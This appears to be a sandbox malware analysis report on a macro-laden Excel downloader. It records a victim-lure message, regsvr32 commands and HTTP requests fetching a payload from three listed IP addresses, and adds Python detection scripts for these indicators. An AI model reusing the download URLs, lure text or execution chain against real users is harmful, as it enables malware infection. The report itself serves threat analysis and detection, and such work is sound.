Windows Analysis Report: Document_1680405650-10062021.xls

Overview

General Information

Sample Name:Document_1680405650-10062021.xls
Analysis ID:498132
MD5:3d6a59b16e0992c234a9e649272d9183
SHA1:d40763ea2a87946c34137adcca9d72a9dbb4f190
SHA256:f0073fcb16de6f8c5c497d318853c3eaf9fb3d03d85ecaf009a33de179c879a2
Tags:xls

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1500 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2552 cmdline: regsvr32 -silent ..\Celod.wac MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2852 cmdline: regsvr32 -silent ..\Celod.wac1 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2908 cmdline: regsvr32 -silent ..\Celod.wac2 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: Document_1680405650-10062021.xls
Rule: JoeSecurity_HiddenMacro
Description: Yara detected hidden Macro 4.0 in Excel
Author: Joe Security

    Sigma Overview

    System Summary:

    Sigma detected: Microsoft Office Product Spawning Windows Shell
    Source: Process started
    Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
    Data:
      Command: regsvr32 -silent ..\Celod.wac
      CommandLine: regsvr32 -silent ..\Celod.wac
      CommandLine|base64offset|contains: ,
      Image: C:\Windows\System32\regsvr32.exe
      NewProcessName: C:\Windows\System32\regsvr32.exe
      OriginalFileName: C:\Windows\System32\regsvr32.exe
      ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      ParentProcessId: 1500
      ProcessCommandLine: regsvr32 -silent ..\Celod.wac
      ProcessId: 2552

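The Sigma hit above keys on two process-creation fields the report shows, ParentImage and Image. The following is an added example written for this page, not code from the report or from the Sigma project: it applies that parent/child logic to constructed events shaped like the Process Tree (EXCEL.EXE PID 1500 spawning three regsvr32.exe children), and adds a second heuristic of its own, flagging regsvr32 invocations whose module argument does not carry a .dll/.ocx/.ax extension, as all three command lines on this page (`regsvr32 -silent ..\Celod.wac`, `.wac1`, `.wac2`) do. The lists of Office parents and shell/LOLBin children are a representative subset chosen for the example, not the published rule text; the benign msiexec event is constructed to show the checks staying quiet.

```python
"""Added example (not part of the Joe Sandbox report): a Sigma-style check for
Office applications spawning a shell or script host, applied to constructed
process-creation events shaped like the report's Process Tree.

The parent/child image lists are a representative subset chosen for this
example, not the text of the published Sigma rule."""
from dataclasses import dataclass
import re

# Representative Office parents and shell/LOLBin children (subset; assumption).
OFFICE_PARENTS = ("\\winword.exe", "\\excel.exe", "\\powerpnt.exe",
                  "\\outlook.exe", "\\mspub.exe", "\\visio.exe")
SHELL_CHILDREN = ("\\cmd.exe", "\\powershell.exe", "\\wscript.exe",
                  "\\cscript.exe", "\\mshta.exe", "\\rundll32.exe",
                  "\\regsvr32.exe", "\\msiexec.exe", "\\certutil.exe")

# Extensions regsvr32 is normally asked to register.
NORMAL_REGSVR32_EXT = {"dll", "ocx", "ax"}


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    image: str
    command_line: str
    parent_pid: int
    parent_image: str


def office_spawns_shell(ev: ProcessEvent) -> bool:
    """Core of the Sigma logic: Office parent image and shell/LOLBin child image."""
    return (ev.parent_image.lower().endswith(OFFICE_PARENTS)
            and ev.image.lower().endswith(SHELL_CHILDREN))


def regsvr32_odd_target(command_line: str):
    """Return the module path if regsvr32 is told to load something that is not a
    .dll/.ocx/.ax, else None.  Every child in the report was
    'regsvr32 -silent ..\\Celod.wac<N>': a relative path with a made-up extension."""
    m = re.match(r'\s*"?(?:[^"\s]*\\)?regsvr32(?:\.exe)?"?\s+(.*)$',
                 command_line, re.IGNORECASE)
    if not m:
        return None
    # Keep quoted paths with spaces together, then drop switches (-silent, /s, ...).
    tokens = re.findall(r'"[^"]*"|\S+', m.group(1))
    positional = [t for t in tokens if not t.startswith(("-", "/"))]
    if not positional:
        return None
    target = positional[-1].strip('"')
    basename = target.rsplit("\\", 1)[-1]
    ext = basename.rsplit(".", 1)[-1].lower() if "." in basename else ""
    return None if ext in NORMAL_REGSVR32_EXT else target


def triage(events):
    """Return one finding per suspicious event, tagged with the checks that fired."""
    findings = []
    for ev in events:
        tags = []
        if office_spawns_shell(ev):
            tags.append("office_spawning_windows_shell")
        odd = None
        if ev.image.lower().endswith("\\regsvr32.exe"):
            odd = regsvr32_odd_target(ev.command_line)
        if odd is not None:
            tags.append("regsvr32_nonstandard_module:" + odd)
        if tags:
            findings.append({"pid": ev.pid, "parent_pid": ev.parent_pid, "tags": tags})
    return findings


# Constructed events mirroring the report's Process Tree, plus two benign ones.
EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
REGSVR = r"C:\Windows\System32\regsvr32.exe"
SAMPLE_EVENTS = [
    ProcessEvent(1500, EXCEL, f"'{EXCEL}' /automation -Embedding", 1234, r"C:\Windows\explorer.exe"),
    ProcessEvent(2552, REGSVR, r"regsvr32 -silent ..\Celod.wac", 1500, EXCEL),
    ProcessEvent(2852, REGSVR, r"regsvr32 -silent ..\Celod.wac1", 1500, EXCEL),
    ProcessEvent(2908, REGSVR, r"regsvr32 -silent ..\Celod.wac2", 1500, EXCEL),
    # benign (constructed): an installer registering a real DLL
    ProcessEvent(3100, REGSVR, r'regsvr32 /s "C:\Program Files\Vendor\comp.dll"',
                 3000, r"C:\Windows\System32\msiexec.exe"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Run stand-alone it prints three findings, one per regsvr32 child of PID 1500, each carrying both tags; the explorer-to-Excel launch and the msiexec-driven registration of a real .dll produce nothing.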
    Jbx Signature Overview


    Software Vulnerabilities:

    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  Process created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 190.14.37.107:80
    Source: global traffic  HTTP traffic detected (the same request was sent to each of the three hosts; only the Host header differs):
      GET /44475.7418916667.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 190.14.37.107   (also sent with Host: 94.140.114.111 and Host: 188.165.62.50)
      Connection: Keep-Alive
    Source: unknown  TCP traffic detected without corresponding DNS query: 190.14.37.107 (repeated)
    Source: unknown  TCP traffic detected without corresponding DNS query: 94.140.114.111 (repeated)
    Source: unknown  TCP traffic detected without corresponding DNS query: 188.165.62.50 (repeated)
    Source: global traffic  HTTP traffic detected (response; three 404 responses were captured, one per request, with Date: Wed, 06 Oct 2021 15:49:03 GMT on the first two and 15:49:04 GMT on the third):
      HTTP/1.1 404 Not Found
      Server: nginx
      Date: Wed, 06 Oct 2021 15:49:03 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Body (one chunk of 0xc4 bytes): <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
    Source: Document_1680405650-10062021.xls  String found in binary or memory: http://188.165.62.50/
    Source: Document_1680405650-10062021.xls  String found in binary or memory: http://190.14.37.107/
    Source: Document_1680405650-10062021.xls  String found in binary or memory: http://94.140.114.111/
    Source: regsvr32.exe, 00000003.00000002.411932743.0000000001C70000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.412744168.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.413485083.0000000001DA0000.00000002.00020000.sdmp  String found in binary or memory: http://servername/isapibackend.dll

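The network evidence above is three identical GET requests for /44475.7418916667.dat, each to a bare IP that was never resolved through DNS, each answered with a 404; no Celod.wac file appears under Created / dropped Files, so the regsvr32 children were handed paths that were never written. The block below is an added example, not part of the Joe Sandbox report: it parses constructed copies of those three requests, flags the traits the sandbox signatures keyed on (direct-to-IP host, no preceding DNS query, the MSIE 7.0 / Trident/7.0 compatibility User-Agent), and adds one check of its own: the requested file name is consistent with an Excel serial date (days since 1899-12-30 with a fractional day), which decodes to 2021-10-06 17:48:19, a few seconds after the analysis start time of 17:48:11 on 06.10.2021 recorded under General Information. Treating that User-Agent as the WinINet/urlmon default on a Windows 7 + IE 11 system is this example's assumption, not a statement the report makes.

```python
"""Added example (not part of the Joe Sandbox report): pull network IOCs out of
raw HTTP requests shaped like the three GETs in the report, flag the traits the
sandbox signatures keyed on, and decode the requested file name.

Assumption: the MSIE 7.0 / Trident/7.0 string is the compatibility User-Agent
that WinINet/urlmon sends on Windows 7 + IE 11, consistent with the
URLDownloadToFileA origin the sandbox logged."""
from datetime import datetime, timedelta
import ipaddress
import re

# Excel 1900 date system epoch; 1899-12-30 absorbs the 1900 leap-year quirk.
EXCEL_EPOCH = datetime(1899, 12, 30)
IE_COMPAT_UA = re.compile(r"^Mozilla/4\.0 \(compatible; MSIE 7\.0;.*Trident/7\.0")


def parse_request(raw: bytes) -> dict:
    """Parse the request line and headers of one HTTP/1.x request."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def is_bare_ip(host: str) -> bool:
    """True when the Host header is a literal IP address (optionally with :port)."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def excel_serial_to_datetime(serial: float) -> datetime:
    return EXCEL_EPOCH + timedelta(days=serial)


def decode_serial_filename(path: str):
    """If the URL path is '/<five-digit serial>[.fraction].<ext>', decode the
    serial as an Excel date; otherwise return None."""
    m = re.fullmatch(r"/(\d{5}(?:\.\d+)?)\.\w+", path)
    return excel_serial_to_datetime(float(m.group(1))) if m else None


def extract_iocs(requests, dns_queried_hosts):
    """Return one record per request with the URL and the flags that fired."""
    out = []
    for raw in requests:
        req = parse_request(raw)
        host = req["headers"].get("host", "")
        flags = []
        if is_bare_ip(host):
            flags.append("direct_to_ip")
            if host not in dns_queried_hosts:
                flags.append("no_preceding_dns")
        if IE_COMPAT_UA.match(req["headers"].get("user-agent", "")):
            flags.append("wininet_ie_compat_user_agent")
        out.append({
            "url": f"http://{host}{req['path']}",
            "serial_time": decode_serial_filename(req["path"]),
            "flags": flags,
        })
    return out


# Constructed requests reproducing the header set the report shows, one per host.
UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; "
      ".NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
      "Media Center PC 6.0; .NET4.0C; .NET4.0E)")
HOSTS = ["190.14.37.107", "94.140.114.111", "188.165.62.50"]
SAMPLE_REQUESTS = [
    (f"GET /44475.7418916667.dat HTTP/1.1\r\nAccept: */*\r\nUA-CPU: AMD64\r\n"
     f"Accept-Encoding: gzip, deflate\r\nUser-Agent: {UA}\r\nHost: {h}\r\n"
     f"Connection: Keep-Alive\r\n\r\n").encode()
    for h in HOSTS
]
SAMPLE_DNS_LOG = set()  # the sandbox saw no DNS query for any of the three hosts

if __name__ == "__main__":
    for rec in extract_iocs(SAMPLE_REQUESTS, SAMPLE_DNS_LOG):
        print(rec["url"], rec["serial_time"], rec["flags"])
```

The serial decode is useful for pivoting: the related sample listed under Joe Sandbox View / Context requested 44475.7050777778.dat, which the same function places on the same day roughly an hour earlier, so the name carries the victim's open time rather than a fixed campaign identifier.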
    System Summary:

    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    Source: Document image extraction number: 0  Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
    Source: Document image extraction number: 0  Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Document image extraction number: 0  Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
    Source: Document image extraction number: 1  Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
    Source: Document image extraction number: 1  Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Document image extraction number: 1  Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
    Source: Document_1680405650-10062021.xls  OLE, VBA macro line: Sub auto_close()
    Source: Document_1680405650-10062021.xls  OLE, VBA macro line: Sub auto_open()
    Source: Document_1680405650-10062021.xls  OLE, VBA macro line: Private Sub saWorkbook_Opensa()
    Source: Document_1680405650-10062021.xls  OLE indicator, VBA macros: true
    Source: C:\Windows\System32\regsvr32.exe  Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: Document_1680405650-10062021.xls  OLE indicator, Workbook stream: true
    Source: unknown  Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac2
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  File created: C:\Users\user\Application Data\Microsoft\Forms
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  File created: C:\Users\user\AppData\Local\Temp\CVRD9CA.tmp
    Source: classification engine  Classification label: mal64.expl.winXLS@7/2@0/3
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  File read: C:\Users\desktop.ini
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  Window found: window name: SysTabControl32
    Source: Window Recorder  Window detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  Process information set: NOOPENFILEERRORBOX (logged 11 times)

    HIPS / PFW / Operating System Protection Evasion:

    Yara detected hidden Macro 4.0 in Excel
    Source: Yara match  File source: Document_1680405650-10062021.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Techniques that signatures in this analysis mapped to (number of hits in parentheses):

    Execution: Scripting (2), Exploitation for Client Execution (22)
    Privilege Escalation: Process Injection (1)
    Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Process Injection (1), Scripting (2)
    Discovery: File and Directory Discovery (1), System Information Discovery (2)
    Command and Control: Non-Application Layer Protocol (2), Application Layer Protocol (12), Ingress Tool Transfer (3)

    No hits were mapped to Initial Access, Persistence, Credential Access, Lateral Movement, Collection, Exfiltration, Network Effects, Remote Service Effects or Impact.

    Behavior Graph

    (graph image not reproduced in this capture)
    Screenshots

    (screenshot thumbnails not reproduced; the OCR text extracted from them is listed under "Office document tries to convince victim to disable security protection" above)

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Source                                       Detection  Scanner          Label
    http://190.14.37.107/44475.7418916667.dat    0%         Avira URL Cloud  safe
    http://188.165.62.50/44475.7418916667.dat    0%         Avira URL Cloud  safe
    http://94.140.114.111/44475.7418916667.dat   0%         Avira URL Cloud  safe
    http://190.14.37.107/                        1%         Virustotal
    http://190.14.37.107/                        0%         Avira URL Cloud  safe
    http://188.165.62.50/                        0%         Avira URL Cloud  safe
    http://servername/isapibackend.dll           0%         Avira URL Cloud  safe
    http://94.140.114.111/                       0%         Avira URL Cloud  safe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    Name                                         Malicious  Antivirus detection    Reputation
    http://190.14.37.107/44475.7418916667.dat    false      Avira URL Cloud: safe  unknown
    http://188.165.62.50/44475.7418916667.dat    false      Avira URL Cloud: safe  unknown
    http://94.140.114.111/44475.7418916667.dat   false      Avira URL Cloud: safe  unknown

    URLs from Memory and Binaries

    http://190.14.37.107/
      Source: Document_1680405650-10062021.xls; Malicious: false; Antivirus detection: Virustotal 1%, Avira URL Cloud: safe; Reputation: unknown
    http://188.165.62.50/
      Source: Document_1680405650-10062021.xls; Malicious: false; Antivirus detection: Avira URL Cloud: safe; Reputation: unknown
    http://servername/isapibackend.dll
      Source: regsvr32.exe, 00000003.00000002.411932743.0000000001C70000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.412744168.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.413485083.0000000001DA0000.00000002.00020000.sdmp; Malicious: false; Antivirus detection: Avira URL Cloud: safe; Reputation: low
    http://94.140.114.111/
      Source: Document_1680405650-10062021.xls; Malicious: false; Antivirus detection: Avira URL Cloud: safe; Reputation: unknown

    Contacted IPs


    Public

    IP              Domain   Country  ASN    ASN Name           Malicious
    94.140.114.111  unknown  Latvia   43513  NANO-ASLV          false
    190.14.37.107   unknown  Panama   52469  OffshoreRacksSAPA  false
    188.165.62.50   unknown  France   16276  OVHFR              false

    General Information

    Joe Sandbox Version:33.0.0 White Diamond
    Analysis ID:498132
    Start date:06.10.2021
    Start time:17:48:11
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 4m 59s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:Document_1680405650-10062021.xls
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of new started processes analysed:7
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal64.expl.winXLS@7/2@0/3
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xls
    • Changed system and user locale, location and keyboard layout to English - United States
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
    • Report size getting too big, too many NtSetInformationFile calls found.

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    Match           Associated sample name / URL       Detection   Context
    94.140.114.111  Document_748968552-10062021.xls    malicious   94.140.114.111/44475.7050777778.dat
    190.14.37.107   Document_748968552-10062021.xls    malicious   190.14.37.107/44475.7050777778.dat
    188.165.62.50   Document_748968552-10062021.xls    malicious   188.165.62.50/44475.7050777778.dat

    Domains

    No context

    ASN

    Match: OffshoreRacksSAPA
    Associated sample name / URL                  Detection   Context
    Document_748968552-10062021.xls               malicious   190.14.37.107
    173536952-10042021.xls                        malicious   190.14.37.165
    UdQiakT3q5.xls                                malicious   190.14.37.187
    UdQiakT3q5.xls                                malicious   190.14.37.187
    Compensation-54975366-09272021.xls            malicious   190.14.37.178
    Compensation-54975366-09272021.xls            malicious   190.14.37.178
    CompensationClaim-1630636598-09282021.xls     malicious   190.14.37.187
    CompensationClaim-1033191014-09282021.xls     malicious   190.14.37.187
    xls.xls                                       malicious   190.14.37.178
    Compensation-1214892625-09272021.xls          malicious   190.14.37.178
    Compensation-2100058996-09272021.xls          malicious   190.14.37.178
    Compensation-1657705079-09272021.xls          malicious   190.14.37.178
    Compensation-1214892625-09272021.xls          malicious   190.14.37.178
    #Qbot downloader.xls                          malicious   190.14.37.178
    Compensation-2308017-09272021.xls             malicious   190.14.37.178
    Compensation-1730406737-09272021.xls          malicious   190.14.37.178
    Claim-838392655-09242021.xls                  malicious   190.14.37.173
    claim.xls                                     malicious   190.14.37.173
    Claim-1368769328-09242021.xls                 malicious   190.14.37.173
    Claim-1763045001-09242021.xls                 malicious   190.14.37.173

    Match: NANO-ASLV
    Associated sample name / URL                  Detection   Context
    Document_748968552-10062021.xls               malicious   94.140.114.111
    8AcNX5GzVY.exe                                malicious   94.140.115.133
    4i2nattkLT.exe                                malicious   141.136.0.203
    Document_1752244602-Copy.xls                  malicious   94.140.114.44
    Document_1752244602-Copy.xls                  malicious   94.140.114.44
    Document_1752244602-Copy.xls                  malicious   94.140.114.44
    qbot5.xlsx                                    malicious   94.140.114.44
    qbot5.xlsx                                    malicious   94.140.114.44
    qbot5.xlsx                                    malicious   94.140.114.44
    Document_85143683-Copy.xls                    malicious   94.140.114.44
    Document_5153204-Copy.xls                     malicious   94.140.114.44
    Document_143276485-Copy.xls                   malicious   94.140.114.44
    n5coKKBhuN.dll                                malicious   94.140.115.104
    Pk1i5t2XLG.dll                                malicious   94.140.115.104
    oAQ0OaThsM                                    malicious   83.241.70.43
    kecFPnbu5K.exe                                malicious   94.140.114.174
    ac1khvFT2V.exe                                malicious   141.136.0.129
    triage_dropped_file.dll                       malicious   94.140.114.61
    date5.dll                                     malicious   94.140.114.61
    triage_dropped_file.dll                       malicious   94.140.114.61

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):162688
    Entropy (8bit):4.254463966938546
    Encrypted:false
    SSDEEP:1536:C6OLrFNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CbNNSc83tKBAvQVCgOtmXmLpLm4l
    MD5:B9E2B9BAFAC03EFAC9F8586015724F6D
    SHA1:9BD2E03AB3171A1F1C2F737761AA2D3ACDE0A151
    SHA-256:413466669136250D3EAEB8BF440B69785783FAA70B6F2CB68978817769C4788E
    SHA-512:D7EB0BC9C04F0EDC45E8EB896418F35B1E6074A6624649500E4B4E3B3F44A84300859B294F3729EC3C6465284626B0020D97FC15F6F927CD37C8D062288F7BF3
    Malicious:false
    Reputation:low
    Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
    C:\Users\user\AppData\Local\Temp\VBE\RefEdit.exd
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):15676
    Entropy (8bit):4.533034713957857
    Encrypted:false
    SSDEEP:192:fxBA11DxzCOtHIT6P20eChgZjTdZ3HJV8L1I17EMBkDXrq9LwGGLVbkLde:fT8xesT20lheZ3waE5D7qxIxkxe
    MD5:1ADB3CF0BB04C8EA30EDC512F366E220
    SHA1:C6EEF574ECF64559618FD4439BD06638F46C35BD
    SHA-256:79C4F80CC36CFF260F1FA18DE1CB3BCEE889D9849FF4CB3EA3C4EF34CBBA067E
    SHA-512:AE028C1A681A4DC089609F78BEDFD7EFE82376FE33A0BE62424DE077DB92C4C0426DAC14EAFD2403078A5C9FD7E22CCE8076431328A806CA04E604B92B54AE2E
    Malicious:false
    Reputation:low
    Preview: MSFT................A...............................1............... ...................d...........,...................\...........H...4...........0... ...............................................................x...............................x.......................................................................................$"...............................................P..................................................$"..........................................0....P..,.........................0.....................%"..........................................H..."...................................................H.......(...................@...................P...............0.......`...............................p...X... ...............rX..z0.E.;uK.62..........E.............F...........B........`..d......."E.............F........0..............F..........E........`.M...........CPf.........0..=.......01..)....w....<WI.......\.1Y........k...U........".......|...K..a...

    Static File Info

    General

    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Wed Oct 6 08:51:31 2021, Security: 0
    Entropy (8bit):6.995654110144714
    TrID:
    • Microsoft Excel sheet (30009/1) 47.99%
    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
    File name:Document_1680405650-10062021.xls
    File size:136704
    MD5:3d6a59b16e0992c234a9e649272d9183
    SHA1:d40763ea2a87946c34137adcca9d72a9dbb4f190
    SHA256:f0073fcb16de6f8c5c497d318853c3eaf9fb3d03d85ecaf009a33de179c879a2
    SHA512:a0bbbe112cca1e584aa828c320f888836c28b77cbf0ed93286cf6885e364408dbb178b816c0c8bf7d34e13b9539203e8dc194224b6a75da0a4e608395ff5df7d
    SSDEEP:3072:3k3hOdsylKlgxopeiBNhZFGzE+cL2kdAPc6YehWfGEtUHKGDbpmsiikati+RL+y:3k3hOdsylKlgxopeiBNhZF+E+W2kdAPb
    File Content Preview:........................>.......................................................b..............................................................................................................................................................................

    File Icon

    Icon Hash:e4eea286a4b4bcb4

    Static OLE Info

    General

    Document Type:OLE
    Number of OLE Files:1

    OLE File "Document_1680405650-10062021.xls"

    Indicators

    Has Summary Info:True
    Application Name:Microsoft Excel
    Encrypted Document:False
    Contains Word Document Stream:False
    Contains Workbook/Book Stream:True
    Contains PowerPoint Document Stream:False
    Contains Visio Document Stream:False
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:True

    Summary

    Code Page:1251
    Author:Test
    Last Saved By:Test
    Create Time:2015-06-05 18:17:20
    Last Saved Time:2021-10-06 07:51:31
    Creating Application:Microsoft Excel
    Security:0

    Document Summary

    Document Code Page:1251
    Thumbnail Scaling Desired:False
    Company:
    Contains Dirty Links:False
    Shared Document:False
    Changed Hyperlinks:False
    Application Version:1048576

    Streams with VBA

    VBA File Name: UserForm2, Stream Size: -1
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2
    VBA File Name:UserForm2
    Stream Size:-1
    Data ASCII:
    Data Raw:
    VBA Code
    Attribute VB_Name = "UserForm2"
    Attribute VB_Base = "0{321AAC3F-DD5A-4CF0-A4C5-4038687335A4}{A2E6A6F6-AD1B-4ECB-AF0A-AF8F18A7E980}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = False
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = False
    VBA File Name: Module1, Stream Size: 3267
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/Module1
    VBA File Name:Module1
    Stream Size:3267
    Data ASCII:. . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
